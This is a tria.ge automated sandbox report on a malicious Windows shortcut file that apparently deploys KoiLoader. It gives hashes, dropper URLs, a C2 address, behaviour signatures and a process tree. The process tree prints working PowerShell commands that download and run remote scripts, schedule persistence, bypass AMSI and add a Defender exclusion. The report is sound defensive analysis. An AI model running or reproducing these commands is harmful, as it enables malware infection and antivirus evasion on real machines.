Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    136s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 08:53

General

  • Target

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk

  • Size

    1KB

  • MD5

    4faa35703e3c7a20143562b271ceca2f

  • SHA1

    2d87ff75eb532029ab63ed68971471589f28a847

  • SHA256

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926

  • SHA512

    ab0659b71b2a6593a288d1fe869f3615dea4eb3684df62670f1bfb38b342a8a529fa933ee78743aa162d474ffaad7b9e381f6c3186d2bed798fb27f3bfa09133

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php

exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1

Extracted

Family

koiloader

C2

http://178.17.170.209/overglass.php

Attributes
  • payload_url

    https://www.centralelatterieti.com/wp-content/uploads/2020

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Koiloader family
  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('778ycf5h9kz2sm.js iagx9x77v'); $dwnf='Dow'+'nl'+'oadF'+'ile'; $b10frxwtardxmxv8j = New-Object Net.WebClient; $wsd = $b10frxwtardxmxv8j.DownloadString('https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/commendedtz4.php', '778ycf5h9kz2sm.js'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/caninusAXRu.php', 'iagx9x77v.js'); . ('scht'+'as'+'ks') /create /sc minute /mo 1 /f /tr ($wsd + $pdw) /tn iagx9x77v;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v" /tn iagx9x77v
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3460
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn iagx9x77v /f; wscript $env:programdata\iagx9x77v.js "
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn iagx9x77v /f
        3⤵
          PID:2948
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\iagx9x77v.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$tp=[Ref].Assembly.GetTypes();$ppa = 'https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php'; $dnl = $null; $ppb = 'https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1'; Foreach($tt in $tp) {if ($tt.Name -like '*m?iUt*s') {$c=$tt}}; $env:paths = '7zNJYJYMAYLT'; IEX(Invoke-WebRequest -UseBasicParsing $ppa); IEX(Invoke-WebRequest -UseBasicParsing $ppb)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5024
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5104
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3224
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2752
    • C:\Windows\System32\wscript.exe
      C:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"
      1⤵
        PID:3288

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\778ycf5h9kz2sm.js

        Filesize

        198B

        MD5

        af9f1f2076317c03e21d56367e638af4

        SHA1

        61c4f850591f851acd3108104ef14f0fe32f95a6

        SHA256

        70835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1

        SHA512

        c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c

      • C:\ProgramData\iagx9x77v.js

        Filesize

        1KB

        MD5

        25e9962ac37d97cbdee7559e4e1b7449

        SHA1

        fee35bda08a44de7bef6a36d73fb20b7cc3c87ef

        SHA256

        65a7f10535e24bf5356ad60262b95d37b179d7ff984e50807febcb265f6dcc07

        SHA512

        d72adf5113b24f2a6445343c52ea6e652cb44231947e8245d769dd0de387a945ece32e9513261b6db41b6ffd4070ecfd9fc6135cae5a9a3672ba926e7788884e

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        960480b3e0259feb69050108602f0f3f

        SHA1

        af319a1d40288b1de447bb634338a2ef344d9bd6

        SHA256

        9562246c9359710f9c19da7fee989a67a64962ae099c6e3571fcdf27b255bd96

        SHA512

        a6707f58fe9bac7b2676b34b54cc99943ff0a56f64fab7d87ad66f92474dc238b9a8ee9d2032f21a6a3480cd721ac14cb7acd9f82e6658a902666d58a7029ddf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        1bad2704664b4c1a190586ec492be65f

        SHA1

        1c98e6645c66774152c184d23f7a3178ce522e7b

        SHA256

        5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

        SHA512

        668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m11apmej.xws.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2572-19-0x00007FFD63E90000-0x00007FFD64951000-memory.dmp

        Filesize

        10.8MB

      • memory/2572-14-0x00007FFD63E90000-0x00007FFD64951000-memory.dmp

        Filesize

        10.8MB

      • memory/2572-13-0x00007FFD63E90000-0x00007FFD64951000-memory.dmp

        Filesize

        10.8MB

      • memory/2572-3-0x00000234C6E20000-0x00000234C6E42000-memory.dmp

        Filesize

        136KB

      • memory/2572-2-0x00007FFD63E93000-0x00007FFD63E95000-memory.dmp

        Filesize

        8KB

      • memory/2752-97-0x0000000007B70000-0x0000000007B78000-memory.dmp

        Filesize

        32KB

      • memory/2752-96-0x0000000007B90000-0x0000000007BAA000-memory.dmp

        Filesize

        104KB

      • memory/2752-95-0x0000000007A90000-0x0000000007AA4000-memory.dmp

        Filesize

        80KB

      • memory/2752-70-0x0000000070A90000-0x0000000070ADC000-memory.dmp

        Filesize

        304KB

      • memory/2752-94-0x0000000007A80000-0x0000000007A8E000-memory.dmp

        Filesize

        56KB

      • memory/2752-84-0x0000000007A50000-0x0000000007A61000-memory.dmp

        Filesize

        68KB

      • memory/2752-83-0x0000000007AD0000-0x0000000007B66000-memory.dmp

        Filesize

        600KB

      • memory/2752-82-0x00000000078C0000-0x00000000078CA000-memory.dmp

        Filesize

        40KB

      • memory/2752-81-0x0000000007750000-0x00000000077F3000-memory.dmp

        Filesize

        652KB

      • memory/2752-80-0x0000000006B00000-0x0000000006B1E000-memory.dmp

        Filesize

        120KB

      • memory/2752-69-0x0000000007710000-0x0000000007742000-memory.dmp

        Filesize

        200KB

      • memory/3020-35-0x0000000002A90000-0x0000000002AC6000-memory.dmp

        Filesize

        216KB

      • memory/3020-38-0x0000000005490000-0x00000000054F6000-memory.dmp

        Filesize

        408KB

      • memory/3020-55-0x00000000078B0000-0x00000000078B1000-memory.dmp

        Filesize

        4KB

      • memory/3020-54-0x0000000007A00000-0x000000000807A000-memory.dmp

        Filesize

        6.5MB

      • memory/3020-53-0x00000000067C0000-0x00000000067DA000-memory.dmp

        Filesize

        104KB

      • memory/3020-52-0x00000000063C0000-0x000000000640C000-memory.dmp

        Filesize

        304KB

      • memory/3020-51-0x00000000063A0000-0x00000000063BE000-memory.dmp

        Filesize

        120KB

      • memory/3020-49-0x0000000005D90000-0x00000000060E4000-memory.dmp

        Filesize

        3.3MB

      • memory/3020-39-0x0000000005500000-0x0000000005566000-memory.dmp

        Filesize

        408KB

      • memory/3020-56-0x0000000007940000-0x000000000794D000-memory.dmp

        Filesize

        52KB

      • memory/3020-36-0x00000000056A0000-0x0000000005CC8000-memory.dmp

        Filesize

        6.2MB

      • memory/3020-37-0x00000000053F0000-0x0000000005412000-memory.dmp

        Filesize

        136KB

      • memory/5104-102-0x0000000008630000-0x000000000864A000-memory.dmp

        Filesize

        104KB

      • memory/5104-103-0x00000000086E0000-0x0000000008730000-memory.dmp

        Filesize

        320KB

      • memory/5104-104-0x00000000087D0000-0x0000000008862000-memory.dmp

        Filesize

        584KB

      • memory/5104-101-0x0000000008BE0000-0x0000000009184000-memory.dmp

        Filesize

        5.6MB

      • memory/5104-100-0x0000000007E70000-0x0000000007E92000-memory.dmp

        Filesize

        136KB